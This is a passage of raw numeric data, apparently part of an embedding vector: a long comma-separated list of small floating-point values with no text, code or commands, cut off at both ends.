5,0.01373695,-0.0032901936,0.017049499,-0.019431569,-0.004927856,-0.009794075,-0.0012144952,-0.002304188,0.012573858,0.003850269,0.028654523,-0.02752625,-0.00766542,0.0022621579,0.03817189,-0.027997132,0.024294144,-0.0028786715,-0.004495525,0.019062009,0.011427675,0.072240435,0.0050257845,-0.038113825,0.0015118963,0.02491315,-0.012713707,-0.008783148,0.00862778,-0.021648834,0.0047716685,-0.009117772,-0.004754394,-0.00001952886,0.013848683,-0.015068619,-0.005564619,0.0061079753,0.0012554529,-0.0073369225,0.0013653705,0.0032617631,-0.014112308,-0.032620687,-0.03773056,-0.0181317,0.001603807,0.015370049,0.030434446,-0.005314642,-0.008318013,-0.02155119,0.018277427,-0.003402495,-0.0054937373,0.017808203,0.004720336,-0.011852884,0.0048128106,0.0014015147,0.013901689,0.0082602715,0.008656042,0.010648172,0.014011176,0.0008188645,0.0030666024,-0.0044938526,0.008699711,0.009427989,-0.0018475939,-0.013492186,0.03775137,0.027301298,-0.008404438,-0.0012606172,-0.006956684,0.017614793,0.017829174,-0.013720891,0.011857661,0.0056343144,0.014567219,-0.018120542,-0.028962152,-0.003545953,-0.0007928678,0.005040052,0.002935635,0.00056399475,-0.02144678,0.014751503,0.0067415433,0.00555119,0.0056957295,0.0054525016,0.01987297,0.0027617377,0.017011626,0.0064292923,-0.0054005375,0.00518646,0.01250208,0.00048539852,0.0056834714,-0.0126964,-0.012088401,-0.009456124,0.022449289,0.017321339,-0.023716472,0.008117895,0.01280996,0.014480312,-0.010029519,0.020235313,0.024804818,-0.007350417,-0.012879316,-0.008194983,0.002810185,-0.017335057,-0.015872402,-0.023432994,0.01661149,0.0022592305,0.013369167,0.015461476,-0.0016762883,0.0030553606,-0.012042978,0.015062403,-0.057068,0.015979588,0.008521371,0.0065953853,-0.012022059,0.04135325,-0.01982054,0.0010845662,0.0069494224,-0.016047474,0.001273832,-0.013467516,0.007409771,-0.0026464127,0.015786165,0.0023395733,-0.024962118,-0.032902423,-0.0142568555,-0.050757598,0.013371916,0.027356112,-0.019163646,0.0098427525,0.0058696177,-0.00097004976,-0.0088730175,-0.001944385,0.0038176158,-0.016975481,0.0021685222,0.0016344268,-0.011363852,-0.011829474,-0.008672073,-0.0010035695,-0.005513295,0.012355468,-0.016809795,-0.0051033255,0.014471787,-0.0060644164,-0.020864762,-0.011045153,-0.010711579,0.019736594,-0.019917998,0.011877738,-0.01213539,0.03105807,-0.011175904,0.005776609,-0.0022672433,0.0039719515,-0.0065710405,-0.0059768986,-0.017645817,0.02669453,-0.008613293,-0.000704928,-0.009274694,-0.0043264865,0.015245999,-0.0055439207,0.017504038,0.021460533,0.022976361,0.008567999,0.011197358,0.007351695,0.014707507,0.022602743,0.0067891967,0.008836192,0.0054690177,0.007917143,0.012551668,0.014014158,-0.012676065,-0.006887295,0.0057458677,-0.020064157,0.007403004,0.025599774,-0.011394507,-0.0052090823,0.016504766,-0.011651356,0.00030933932,-0.0028920542,0.0017202096,-0.00024194726,-0.010169071,0.014447961,0.0008666175,0.0020036935,-0.012549521,-0.04191052,-0.02492189,0.03184592,0.009926421,-0.010752054,-0.020139871,-0.0011343644,-0.0024984365,-0.015196091,-0.026682733,-0.010863841,-0.009271816,0.035481382,-0.007993289,0.018736744,0.0011892881,-0.0036669557,0.028049093,0.03524511,-0.003227692,0.0161957,-0.010197718,-0.011542912,0.025233032,0.032547504,-0.00080182904,-0.011907293,-0.021292374,0.004456605,-0.015478392,-0.008620462,0.00814921,0.016036773,0.025170311,0.008256812,0.009116645,0.009304573,-0.002884327,-0.020583104,-0.0018947853,-0.03615953,-0.016536364,-0.026688697,0.0076806056,-0.0117596965,0.017517876,0.004651349,0.028285867,0.0037388338,-0.0018455813,0.010464148,0.0018536492,0.012746502,0.022168484,-0.000035322486,-0.024810737,0.0030433394,-0.007385923,0.024059802,0.013703646,-0.0088526,-0.007863792,-0.017528618,-0.01411238,-0.008602527,-0.004596929,-0.008411468,0.012458654,0.00870221,-0.025895726,0.02303278,-0.006344777,0.0066925907,0.005135431,0.003287017,-0.026596991,-0.022897827,-0.008757212,-0.023257917,-0.020253286,0.01445265,0.010034936,-0.01647854,0.012631964,-0.0146905165,-0.047383405,0.021943806,-0.019194739,0.004040895,0.028217295,-0.012477877,-0.0015511888,-0.015051605,-0.0049356045,-0.0063912882,0.0009834376,-0.03134845,-0.0046699094,0.003191383,-0.008094768,0.01724708,-0.011632824,-0.0015013171,0.015310333,-0.018840868,-0.01556695,0.019106947,0.0045180134,-0.0044619124,-0.014612065,0.009562383,0.0071263206,-0.004701137,0.0024934304,-0.007586099,0.014010098,-0.006229536,0.026847295,0.0035614332,-0.0035581726,-0.0059452555,-0.016194858,0.013264835,0.0023918503,-0.0052153626,-0.0056580356,-0.007429188,-0.008799073,-0.0047332733,0.0016888526,0.009329109,0.006915553,0.017203545,0.0024601482,0.0099727055,-0.010112415,-0.031683456,0.009296382,0.005480483,0.009828543,-0.005728713,-0.021934012,0.004211071,0.009244548,0.0039191125,-0.009620236,0.017870048,0.0012169118,-0.016311644,0.0047864886,-0.0065473975,-0.021663344,-0.016206656,0.02162179,-0.01708142,0.017090151,-0.0065732296,-0.0027613037,0.014989077,-0.010603263,-0.014890299,-0.0048400685,-0.02707013,0.011023568,0.012005235,-0.0023226363,-0.0117609,0.022329692,0.023357159,0.0061189653,-0.0012988874,-0.010030093,0.030275762,0.005505548,0.021053914,0.0008157891,0.01854403,-0.001957113,0.0010238189,-0.021385904,-0.007688426,0.021147767,-0.011704312,0.015202254,0.035269145,0.01246765,-0.017197572,-0.00035346716,-0.022226857,-0.009370717,0.021572264,-0.002530688,0.02030316,-0.014128067,0.017221661,0.013600367,-0.010662504,0.02250893,-0.006010023,-0.04007269,0.0088364575,0.020710059,-0.0025501722,-0.00062276033,0.01562635,0.014091978,-0.0058279284,0.030824134,-0.0055780164,0.00087510207,-0.016053237,0.00074960105,-0.014166332,0.0050698877,-0.015758894,-0.03172478,0.039246168,0.0024061212,-0.0062560104,0.012713583,0.0079460405,0.009574733,0.0009541291,0.013398867,-0.010066609,0.006477825,-0.00071433326,-0.010980278,0.013041836,0.018687444,0.027129026,-0.0064682607,0.003161174,0.00097426336,-0.02142433,-0.001171385,0.005886283,-0.014482437,0.009252741,-0.0055578356,-0.00074047025,-0.013205237,0.025850747,-0.0064664115,0.011587781,-0.021093749,-0.01122509,-0.003787788,-0.022770805,0.014784196,-0.008747953,0.016248874,0.020195024,0.012418753,0.025266405,0.010139215,0.015901875,0.01520666,-0.0051455745,-0.0009176856,-0.0012776125,-0.005941014,0.017085677,-0.011713775,-0.0069727455,-0.0022175012,-0.010226454,0.0063855127,-0.0029400587,-0.018330388,0.010563316,0.005606048,0.01019536,0.00024579756,0.028689023,0.013729266,-0.010771217,-0.0039264583,-0.0016757689,-0.0051212134,-0.0034679994,-0.019261979,0.0054886537,-0.0055168825,0.009688231,-0.004972662,0.01454583,-0.0028043923,-0.011989771,-0.0073881596,0.0024598744,-0.0010227046,0.015514587,-0.029674675,0.016344007,0.004528624,0.033442587,-0.010753694,0.0010914665,0.031836726,-0.019780938,-0.022437626,0.023634646,-0.029491693,0.00085736153,-0.0019425203,-0.020477206,0.031705275,0.017131185,-0.019376835,-0.0108077135,-0.0020887952,0.000493481,0.032681014,-0.012669131,0.0018097218,0.028822063,0.06735607,-0.002053735,-0.0012014853,0.0030049505,-0.0019180919,-0.0030192425,-0.012192036,0.000004109228,0.017534666,-0.0028311654,-0.014418572,0.029324435,-0.009582172,0.020496946,-0.0037535198,-0.00089566974,0.005947639,-0.009848853,-0.0020439362,0.002867869,0.00084048026,0.012307574,-0.010594078,-0.030062197,-0.033418246,0.015840651,-0.0009487533,0.0073371367,-0.030225664,0.016805867,-0.0046399185,-0.011257599,0.0140605,-0.003088106,-0.007806567,-0.022657802,-0.012477809,0.019563077,0.0023899893,-0.008975488,0.0034278359,-0.0068001635,-0.008769111,-0.01630219,0.0046473537,0.003889722,-0.034719814,-0.012991676,-0.0116788335,-0.0033622298,-0.027977256,-0.0010775842,0.014533807,-0.011410738,-0.005239199,0.018343277,0.007904272,0.019125061,0.02858522,-0.012480975,-0.020792825,0.0030949262,0.009452854,0.019786507,0.027107503,0.02494724,0.004684998,-0.009239604,-0.025397325,-0.006805814,-0.029818898,-0.010284022,0.0021074947,0.02082931,0.0133487545,0.0124829225,-0.02399082,-0.016250579,0.010092011,0.009197621,0.0010652688,0.0062689246,-0.026764568,-0.010783145,-0.0106184175,0.00560049,-0.0077364957,-0.007352308,0.022037936,-0.015459766,-0.015736204,-0.0017445228,-0.0026437275,-0.019001,-0.02570365,0.01202085,-0.027222255,-0.02255296,-0.010320517,0.0015318701,0.027968919,-0.022987915,0.010039982,-0.0038603572,0.0038072928,-0.003995154,0.00708761,-0.009487283,0.0109057715,-0.0030087237,-0.0008397973,-0.00463085,0.039538577,-0.011962346,0.03395263,-0.007798158,-0.0043589585,0.023971846,-0.009293427,0.0049537006,-0.00035941298,-0.03197635,0.00314611,0.0028010681,-0.004585377,0.012453124,0.016284626,0.031469163,0.002691159,-0.004052887,-0.0020229248,0.013774931,-0.001514789,-0.00030725586,-0.012040707,-0.015712988,-0.018200105,0.00088039186,-0.018281104,-0.026063446,-0.019717082,0.002947064,-0.0030624517,-0.015988499,0.010616719,0.006704822,0.016288519,-0.02539959,0.033720702,0.01593745,0.0039930823,-0.0021491966,-0.0013909,0.0041565616,0.013234216,-0.0077557545,-0.00677688,0.015360223,-0.029232934,-0.018370625,0.00361171,-0.0038044793,0.0055347644,-0.00018501791,0.014517166,-0.033330858,0.022073606,0.030335613,-0.012972668,-0.038826216,0.0170304,-0.01854715,-0.0055126664,0.00326903,-0.008051313,0.0089828195,0.020324042,-0.0032814879,0.00053587026,0.00991253,0.006164354,-0.019984627,0.057793323,-0.02466168,-0.005051622,-0.036349256,-0.0038613589,-0.0155257005,-0.0019157396,0.0031587493,-0.0069338763,0.00028144533,-0.01932093,-0.016038993,0.010298005,-0.028481372,0.007960131,0.0030869923,0.0049432684,-0.004612894,0.0102716135,-0.0046619577,0.008897889,-0.004553343,-0.0024777777,-0.0074015385,0.0058797286,0.014898712,-0.0017969134,0.009085218,-0.020143129,-0.013744154,-0.0056125694,0.017709548,0.0022384645,0.015516463,0.010208174,0.004577627,0.0011278236,-0.009846082,-0.014023954,-0.008497997,0.019349389,-0.011686089,0.07992212,-0.015410401,-0.0053235358,0.0017984054,0.009276896,0.008544361,0.0025520225,-0.010385094,0.014537699,0.0053216405,-0.009033251,-0.0045201085,-0.005499312,0.015400361,-0.0024471323,0.009334325,0.01846437,0.01296731,0.017062934,-0.0101723345,-0.0068152687,0.0015155288,-0.013085341,-0.0052982247,0.019611403,-0.015579723,-0.00638231,-0.018217368,-0.01451643,-0.0035632707,-0.00961562,-0.007000758,-0.009238191,0.016582731,0.03957028,-0.024365056,-0.001020225,0.0038771185,0.00009536021,-0.015391074,0.027948217,0.00021115136,0.0011992472,0.0014302608,0.01705595,-0.016910164,0.06700193,0.023437863,0.02576745,-0.009081087,0.0119813,0.01633542,-0.00042999716,0.020450067,-0.003476384,0.0039926874,0.010862716,0.00825261,0.011594755,0.013969135,0.009611989,0.0004924194,-0.014944547,-0.0052437787,-0.0014770761,-0.02601283,0.0077840807,0.010288142,0.014368301,-0.002168729,0.008519208,0.014082026,0.007310595,0.017617976,0.006284019,-0.0026824626,-0.013858977,-0.031226562,0.00033076745,0.0007407256,0.011813792,-0.0770465,0.019926155,0.2422732,0.008833265,0.016402645,-0.0040170928,0.0016497929,0.0065435846,-0.0952336,-0.006893873,-0.010440499,0.00088423747,-0.015016867,-0.02291373,-0.015231795,0.019354673,0.024627184,0.03179193,0.021028182,-0.037467405,0.014479862,-0.023826282,0.005815045,0.0024237214,0.005252803,-0.0018849424,-0.026729435,-0.0020104686,0.016394708,-0.024654292,-0.021221396,-0.0053154617,-0.008157746,0.008244436,0.0003879082,-0.0046545,-0.03360886,-0.0051901243,0.01747452,0.010033454,-0.01217746,-0.040491845,0.0058183484,-0.014741039,-0.023375778,-0.026408073,-0.16980863,0.018829625,0.005249903,-0.03516591,0.039839324,0.014637353,-0.005089661,-0.00079065305,0.013737995,-0.038110677,0.0028469167,0.011021086,0.005910452,0.0031939151,-0.00905819,-0.005332278,-0.0067220237,0.0035791583,0.0059675416,-0.0016658613,0.004445908,0.016765708,-0.017018653,-0.01591049,-0.000092612856,-0.0006777973,-0.0028869049,0.016242208,-0.021554757,0.010312872,-0.022353679,0.018142013,-0.008678806,0.0041430146,-0.019320888,-0.036741983,-0.026263377,0.019629117,-0.0022008086,0.008670979,0.0049589,0.0019514709,0.0022447484,0.017113917,0.0019147119,0.0181688,0.013245042,0.016143356,0.006031114,0.015573123,0.031719245,0.0058288854,-0.035686225,-0.017709551,-0.013414429,-0.0003532845,-0.012932476,-0.00751488,-0.009666403,-0.0062677623,-0.0040036375,-0.017377915,-0.01793525,-0.022239167,0.04230766,-0.02255617,-0.0073404396,-0.028649122,-0.0016859762,0.00075885095,-0.014132017,0.012084093,0.006287479,-0.026931532,0.011566507,0.020487335,-0.014688892,-0.0073881387,0.00554721,-0.008448215,-0.006914645,-0.013589185,-0.0033879022,-0.019867294,0.00028301415,0.0049852896,0.0010012952,-0.002436339,0.004814026,0.005383246,0.0046555945,0.016125048,0.017385693,0.012938059,0.0009434209,0.0017733308,0.0100067295,0.0058959248,-0.04120434,0.0151377255,0.011350367,-0.0076929685,-0.010379479,0.0058466312,-0.03267973,0.01017935,-0.018070048,-0.010850315,-0.035052493,0.006117034,-0.009074249,0.010985675,-0.0036288803,-0.014458969,-0.022030877,-0.014374282,0.02105118,0.0015412015,-0.008869515,0.0044737314,-0.03863258,-0.023174673,-0.028045699,0.0012285152,0.046008427,-0.0075365966,-0.025460586,-0.007192023,0.015371116,-0.017329521,-0.0116623305,-0.004382823,-0.010241108,0.005380286,0.0033910188,0.01292526,-0.012513979,-0.014864378,-0.041519407,0.005357946,0.000088008404,-0.015316387,-0.0077073937,-0.011631077,0.007576793,-0.014553706,0.022402944,0.003433202,0.02603187,-0.010767999,-0.006980161,0.04482891,-0.0029665853,-0.017858969,-0.023682807,0.11134311,-0.007777843,-0.0361467,0.00037838393,-0.015456939,0.011562207,0.020008974,0.0041083437,-0.022847386,-0.007205972,-0.008122684,-0.005261521,-0.008826396,0.023983585,-0.015501294,0.02798504,0.009292201,0.011717068,-0.0018309467,0.0134725105,0.01445637,-0.017643688,-0.012699501,0.021352122,0.027269794,0.0021754939,0.0014766736,0.025031127,-0.015117891,-0.0069579347,-0.025290947,0.012008133,-0.0057162493,-0.0070706294,-0.0029320235,-0.05865226,-0.015613905,0.004792386,-0.00955192,-0.002434514,0.0039665895,0.0051618996,0.019614073,-0.023986554,0.017836172,0.0069953124,-0.013765051,0.01692345,-0.008419803,0.011265287,-0.0012964857,0.03222864,-0.009701167,-0.022134766,0.0065690116,-0.018909441,0.027163481,-0.0068506333,-0.013335624,0.0012889977,0.035659637,-0.006927279,-0.010565283,0.004180388,-0.0012779713,0.006859806,0.0023815255,0.009363293,0.01643569,0.025865963,-0.0029237769,0.0062210225,0.0058879107,0.031150654,-0.0058639096,-0.01594496,-0.020724816,0.011008988,-0.014229155,-0.004679885,0.00027636415,0.004263805,0.0055740746,0.023783032,-0.024502138,-0.06307424,-0.00811341,-0.009928662,-0.0037406702,-0.012320227,0.012616384,0.010388336,0.027060125,0.0010413293,-0.001893471,-0.016892817,-0.007757941,-0.0038669447,0.015679382,-0.0077747926,-0.0036762166,0.021801466,-0.025636865,0.003087594,-0.008035731,-0.042226426,0.006109707,-0.021994025,0.0011574408,-0.021281498,-0.011971706,-0.0010301479,0.015787892,-0.012217782,-0.0059177643,0.047694184,-0.02394898,-0.0050358553,0.008783971,-0.014851817,-0.013877202,-0.011961866,-0.0019721026,0.0014430394,0.032571796,0.0075645335,-0.017410304,0.014984645,-0.023634434,0.021412825,-0.013480142,0.044396993,-0.0022474015,0.012673315,0.014106416,-0.003119114,-0.0013069985,0.023520371,-0.005194231,0.013136734,-0.009655597,-0.0034127776,0.004013703,0.0065531363,-0.00414854,0.0125221405,0.0029624782,-0.005163084,-0.0073946444,0.0027164924,-0.0058222306,-0.018866703,-0.0090382425,0.00635706,0.005109324,0.011045728,-0.031378943,0.012180947,0.0024701941,-0.0012777824,-0.01224999,0.0076352386,-0.0029305187,-0.0085007325,-0.014951628,0.011704659,0.016252505,0.006339347,0.024113113,0.0024306753,-0.010651966,-0.020648768,0.014984886,-0.004511858,0.0020651303,0.0064473087,0.014421665,-0.0028539752,-0.021620635,-0.0061584488,0.02249573,0.0013086254,-0.014000701,0.010997131,0.017807083,-0.011523089,0.0068023773,0.014668688,-0.00602274,0.013921678,-0.0069216723,0.0056925793,-0.015458597,-0.03631032,-0.019697474,-0.006276011,0.027975777,-0.01262816,0.019509956,0.018917708,0.01632232,0.03797486,0.0014150124,-0.03622361,0.020139454,-0.001822039,-0.034468744,-0.0045477524,-0.0246302,-0.0040996457,-0.0018171782,0.002554488,-0.007826497,0.0033196125,-0.004564314,0.00999253,-0.0080304025,0.010951218,-0.0055331807,-0.02885857,-0.009203105,-0.008933062,-0.0025825452,0.007939699,-0.034833916,-0.00100704,-0.008178838,0.057467837,-0.005553012,-0.0032343052,0.01593892,0.031511445,0.026275717,-0.004558985,0.0017200031,-0.0088572325,0.0064933286,-0.0015626756,-0.021889618,-0.004587512,0.010102617,0.011865804,-0.019968744,-0.00042243308,0.0027989594,-0.025614826,0.00014270177,-0.016742725,-0.007488363,0.0048783547,-0.011489393,-0.00097463897,-0.04217988,0.012888367,0.01363165,-0.018202184,-0.0025937236,-0.0023376266,-0.011526344,-0.0015463508,-0.02788909,-0.016090948,-0.010221539,0.002079996,0.00025533987,0.0036616751,0.005562499,-0.00054807117,0.012190696,0.00061849057,-0.030881207,-0.008205888,0.0017444346,0.014297485,0.012739955,-0.015244392,0.010654129,-0.016056351,0.022023452,0.014737573,-0.00806658,0.018377561,0.0017680171,0.009169046,-0.005474167,0.004359209,0.016622553,-0.0070688347,-0.0043814606,0.007187867,-0.02419008,0.02212332,0.012583405,0.0044963453,-0.015999764,-0.0064789844,0.016138647,-0.014425709,0.025057279,0.014750142,0.0010531064,-0.00909286,-0.003982892,0.011206239,0.0029392175,-0.0077233985,0.0042959796,-0.01712489,0.0013199287,-0.020330878,-0.0056046657,-0.015085432,0.015420404,-0.024418505,-0.015804457,-0.0005774105,-0.012680301,0.027034564,0.0031891814,-0.013212355,-0.013341563,0.0055657676,0.00032078085,-0.0006385057,-0.007895443,-0.0056079477,-0.023174364,0.0010971577,-0.0024324178,0.009181854,-0.0043876087,-0.0019224271,-0.015101358,-0.16419363,-0.0052461615,-0.010138545,-0.020292195,-0.021172583,-0.0059662675,0.02568702,0.06596778,0.01158904,-0.01862507,-0.0006938064,0.02430709,0.005741369,0.017594114,-0.011096557,0.028739743,0.019512726,-0.010230618,0.0026829385,0.018881753,0.008898076,0.01300913,-0.0057485644,-0.008655202,-0.0033465412,0.024753405,-0.005377053,0.021726934,0.017086416,0.015828453,-0.0017541441,-0.0054819216,0.007650026,-0.0012835594,0.0028519074,0.007831318,0.005347063,0.013703505,0.016799374,0.00074453134,0.0054347417,-0.0077897375,-0.007870425,0.016482709,0.010839577,-0.01603966,0.02424202,0.0038003554,0.017664408,0.0008000033,-0.00051964854,-0.011470719,0.024232043,-0.0061306283,-0.0065470836,-0.00003306418,-0.040816687,0.019859498,0.00092780567,-0.010121608,0.013007243,0.017845593,0.014260015,-0.014318419,-0.0066362373,-0.00015036171,-0.00838257,0.0014848307,-0.015129541,0.013540787,-0.012317871,0.0041441163,-0.0026383642,0.00615854,-0.010335753,0.0026721796,0.030304503,0.012187696,0.008377742,0.030114476,-0.026435591,-0.0010441373,-0.010274462,0.011848034,0.0022028221,0.0142187625,0.0056432784,0.007963721,-0.013686528,0.016785547,0.018077334,-0.016378926,-0.025766775,-0.023408374,0.011814559,0.014799225,-0.0047396,0.032715842,0.020098817,0.006144891,0.01563961,0.0071734325,-0.0042068665,-0.0067947647,-0.1318249,-0.0044169645,0.023653287,-0.0019101613,-0.007811847,-0.013137378,-0.0044230153,-0.00093160843,0.012371992,-0.0018653887,0.006977512,0.010441018,0.030505084,0.011747598,0.0044716694,0.014535446,-0.035283267,0.025758991,-0.001042655,-0.0010986718,0.015645891,-0.002339508,-0.04127932,-0.011375043,0.0074402825,-0.008882646,0.0073942677,0.028708365,0.039625205,-0.002069633,-0.0066437335,-0.021706818,0.009993818,-0.005451546,-0.008189218,-0.016730184,-0.015742008,0.0021880395,-0.0028080812,0.018231967,0.015168212,-0.005717367,-0.0027296068,0.011938551,-0.01077462,-0.0010326856,0.01689138,0.009980024,0.0014072631,-0.01850409,-0.015769161,0.00469186,0.005399566,0.014862638,0.013434975,-0.027650652,-0.008359455,-0.01777268,-0.017184889,0.019922175,-0.021611422,0.02004711,-0.0076612392,-0.011762965,-0.008172855,0.022069532,-0.0010688235,0.0007388193,-0.013879048,-0.0019150783,-0.025129072,0.012910076,0.033917747,0.010706994,0.016365755,0.029691491,-0.000553146,0.02791506,0.024694616,-0.012301428,-0.023729265,0.0071899076,0.0006790594,-0.0014065289,-0.007537563,-0.0022009097,-0.0017078089,0.014124094,-0.010376929,0.018131005,0.0011280458,0.021889936,-0.023828477,-0.0067153727,0.022692729,0.00840697,0.024580084,0.013805582,-0.000611091,0.0037019239,-0.031247778,-0.027872471,-0.009934682,-0.0066646077,-0.0047372608,0.0009539248,-0.0047634034,-0.013940543,-0.02052709,0.015385604,0.014397266,0.018878693,0.0042261616,0.0003173673,-0.015353609,0.009864579,-0.0013834306,-0.0072226855,-0.011775987,0.0025095937,-0.004225331,0.026814353,0.0024533796,-0.001864902,-0.020056814,-0.00069464464,-0.021445509,0.020315621,-0.0032582413,-0.003079847,0.011998058,0.002904339,0.009679721,-0.030099828,0.0064964276,0.0071661416,0.01581879,-0.0057880622,0.0063856198,0.014405264,0.00808604,-0.024804411,0.013017665,0.019359829,-0.002139481,0.0029977094,0.0013267117,0.014035906,-0.004565088,0.017251024,-0.021963375,-0.0070188874,0.013604377,0.0014273075,0.0011701664,0.00025566865,-0.028183907,-0.018014066,0.0072486377,-0.0062337443,0.0008067592,-0.0060992395,0.010090146,-0.004580603,0.0058441614,-0.0114251245,0.028392036,-0.0014363448,-0.0049585192,-0.013928356,0.003731178,0.00017226447,0.0042500435,-0.0075632194,0.014728985,0.023437632,0.026510922,0.04800137,0.0057947007,0.021495422,0.01661562,-0.005153848,-0.01261454,-0.0012810867,0.01772258,0.004941821,-0.012828109,0.004686644,-0.0010439954,-0.0021898823,0.03443699,-0.009990155,-0.011050083,0.0030375274,0.010019472,0.0075904587,0.004579201,0.01701459,0.020133432,-0.0011933693,0.0071434136,0.03636693,0.005571484,-0.0041254456,-0.009237775,0.009319705,0.0054289945,0.03055666,0.034655012,-0.008579551,-0.014736348,-0.011727114,0.008282219,0.017619278,0.012926727,0.025300335,0.017284093,-0.015029675,0.023353929,0.010583618,0.026697617,-0.013212979,0.005676331,-0.00025164703,0.019776436,0.052844718,0.024331713,-0.0041552046,-0.0039358223,-0.0051867375,0.018853085,0.010097059,0.0077713276,0.006643495,0.003742653,0.0048417277,0.010215732,0.018845016,0.0031550694,-0.016195033,-0.0022433356,0.028816663,0.0161068,0.012848763,-0.0012701652,-0.0074802646,0.012575087,0.009924007,-0.009825951,0.017613083,0.01036873,-0.015992315,0.010025352,-0.0014274686,-0.012489515,0.011020901,0.020942684,0.0068487446,-0.009284716,0.004461915,-0.031825017,0.0047242483,-0.0033050848,0.013011299,-0.0014719741,-0.015920842,0.025383215,-0.019560901,0.00020382498,0.02530458,-0.008780585,0.005812621,-0.00062931754,0.015833087,0.019174952,-0.0060542007,-0.043986745,-0.0052311453,-0.009235826,0.0025033364,-0.0118960375,-0.009300546,-0.0075281328,0.005174176,0.0052441214,0.003068567,-0.01769118,0.010516743,0.0009424716,0.007685062,-0.007888475,0.008548474,-0.0005785268,-0.017440386,-0.013337039,0.019441076,0.03507907,-0.010688305,-0.008686332,-0.0063892943,0.015903512,0.0002981704,0.02062453,0.014501939,0.0027135075,0.0013288356,-0.0014656159,-0.0026021963,-0.018349092,-0.014697673,-0.000069014095,0.009273471,-0.017544134,-0.00078739837,0.008586655,0.013074283,-0.00793339,0.013305726,0.00014050641,-0.008093435,0.0041076047,-0.02442316,0.013392699,0.002539817,0.022206364,0.01428015,0.014144996,0.023073466,-0.012660143,-0.0031627968,0.03023472,0.03861875,0.0038861707,-0.013069507,0.014968279,-0.010710765,-0.0054331208,0.013340576,0.005204067,0.022357073,0.007076922,0.011206347,0.0041201618,-0.026995016,-0.007851138,-0.007656824,-0.00795903,-0.0041619805,0.018040162,-0.007667295,-0.013977909,0.0065184105,0.0073503563,0.03216392,-0.00882831,-0.015577972,0.0013992928,0.020472046,0.005222432,0.019478055,-0.033955477,0.0034575397,-0.0036185265,0.009046758,-0.010768048,-0.002329575,0.008090212,0.017924452,-0.008355204,0.001359915,-0.008583797,0.0066593406,-0.024513446,-0.029900996,-0.005830075,-0.08481941,0.013037384,0.017547201,-0.023012126,0.009205444,-0.0004848668,-0.017867588,-0.013444167,-0.023520919,0.0167337,-0.0155380145,-0.012520623,-0.027903553,0.015785728,0.030631231,-0.014886106,-0.004617643,0.006350931,0.0114745265,0.00094753306,-0.019379944,0.015251827,0.0030488379,-0.021118399,-0.0020188303,-0.0064512244,-0.00009198197,0.0017018289,-0.0141044315,0.006698389,0.002374804,0.006412135,-0.0017811983,-0.018767375,-0.0064092805,0.012947865,0.0012602351,0.013341447,-0.0050059846,-0.014167615,-0.011935835,-0.002642978,0.023428641,-0.033552796,-0.010283592,0.018415716,-0.039066136,-0.015905598,-0.015932614,0.004498135,0.017660547,0.028704677,-0.011367931,0.01647563,0.017493969,-0.0020287992,0.026444364,-0.008466739,0.016637826,0.003360872,0.0022365616,-0.02592678,0.02341009,-0.016310593,0.00066835026,0.018897746,-0.016762454,0.0154546425,-0.02082806,-0.005351622,0.020498013,0.01106052,-0.031730853,-0.02775343,-0.0074106753,0.014199415,-0.005692549,-0.01529555,0.00063277537,-0.0034567195,0.005620113,-0.00061850954,0.00921612,-0.00885117,0.008209658,0.016566921,-0.0025972377,0.012464473,0.02626149,0.012224669,0.015618545,0.0021998347,0.0086018,0.004372742,-0.0055302978,0.00823826,-0.002745123,0.0033317448,0.008827057,0.004270381,-0.013673189,-0.008239469,0.002519651,-0.0073237116,0.015387542,-0.0058778785,0.006656226,-0.0139221875,-0.0045670755,-0.008554747,-0.009787908,0.010099417,0.021285228,0.01919506,0.009058564,0.0021266076,-0.0011809309,0.021898827,-0.009209421,0.009506667,-0.021989051,-0.012617779,-0.018727163,0.010410797,0.010604894,-0.0033068194,-0.005643868,-0.00021322418,0.01272047,-0.015829714,-0.025024218,0.029238284,0.020659897,0.019229488,-0.0029464408,0.012829023,-0.00080129976,0.005115838,-0.013401615,0.029287238,-0.01572705,-0.04447968,-0.00916153,0.0075482777,-0.0019964192,0.014227331,-0.01212506,-0.011484498,-0.009190907,-0.0017593596,-0.00884427,0.0073686996,0.016291069,-0.0007477365,0.0034450572,0.01499122,0.010063931,0.003775538,-0.015708627,-0.010919809,-0.005913683,0.011535762,-0.002080489,-0.002310409,-0.01475686,0.018117482,0.0235126,-0.0077310936,-0.012280249,-0.02006345,-0.0060869846,-0.0059016487,0.009245062,-0.0055471426,-0.016555276,0.012262717,0.01811525,0.004671992,0.00013997841,-0.012931942,-0.01913546,-0.0005003687,-0.009467342,0.0021735625,-0.01153908,-0.008698378,-0.0021235156,-0.015636707,0.0013477684,-0.016607855,0.00017850415,0.0006076146,0.01414713,0.029686963,-0.009617839,-0.0073585236,0.002685013,-0.004539037,-0.010701784,0.015133924,-0.0072108093,0.004929924,-0.001666381,0.00844663,0.014491198,0.014459577,-0.0015237471,-0.007649439,-0.010714821,0.018155273,0.011675184,-0.018278118,0.0011691136,0.11382517,0.032347567,-0.02460817,0.0031740835,0.0002755786,0.0015450802,0.03474249,-0.008407602,0.0023769992,0.005503925,0.017389938,-0.014222278,0.020074869,0.009523513,-0.023687597,0.026245946,0.007656341,0.0058985353,0.003351095,-0.021219816,0.00064243464,-0.025837502,-0.0150581375,0.025430007,0.0041453578,-0.045867924,0.026906589,0.030234894,0.007945619,-0.008266178,0.010237777,0.014434382,0.006016559,0.0038980346,-0.031122208,0.00010830415,0.01599967,-0.014435623,-0.0013050503,-0.0004928628,0.011828601,0.017859314,-0.0058489544,-0.009903535,-0.022589132,0.013643245,0.0061996104,-0.007441327,0.014830822,-0.0068672732,0.018476,0.0034293444,0.01789546,-0.00696685,0.0045470893,0.0082624955,0.0060994867,-0.0037739216,0.01581041,-0.005548175,0.050383776,-0.010594518,0.016958337,0.01577526,0.026809005,0.0055436883,-0.026563406,-0.0011476135,-0.03760498,-0.026113719,0.029109685,-0.016242456,-0.0013198964,0.008060434,-0.023508977,0.020466013,-0.0057268757,-0.027598703,-0.0016861191,-0.01029137,0.01936059,0.016042648,0.010801858,-0.01734911,0.03159747,-0.00064854126,-0.00737924,0.009907009,0.0048503014,-0.0019399218,0.012076245,0.01781591,-0.0017350568,0.011609708,-0.00611748,-0.00942061,0.027278423,-0.027709505,-0.0037531252,-0.0026043293,0.0006097023,-0.0074217464,-0.0049960758,0.009721418,-0.019002253,-0.016554551,0.003972442,0.013949746,0.0045848787,-0.0006842715,0.0035536601,0.02609944,-0.0073442836,-0.008064996,0.00037521144,0.0031284853,0.0051438888,-0.01442161,0.027962355,-0.02507209,0.010386716,-0.0016222796,0.031840004,0.034461945,0.0011191638,0.018076183,-0.0065469453,0.002432422,0.010505361,-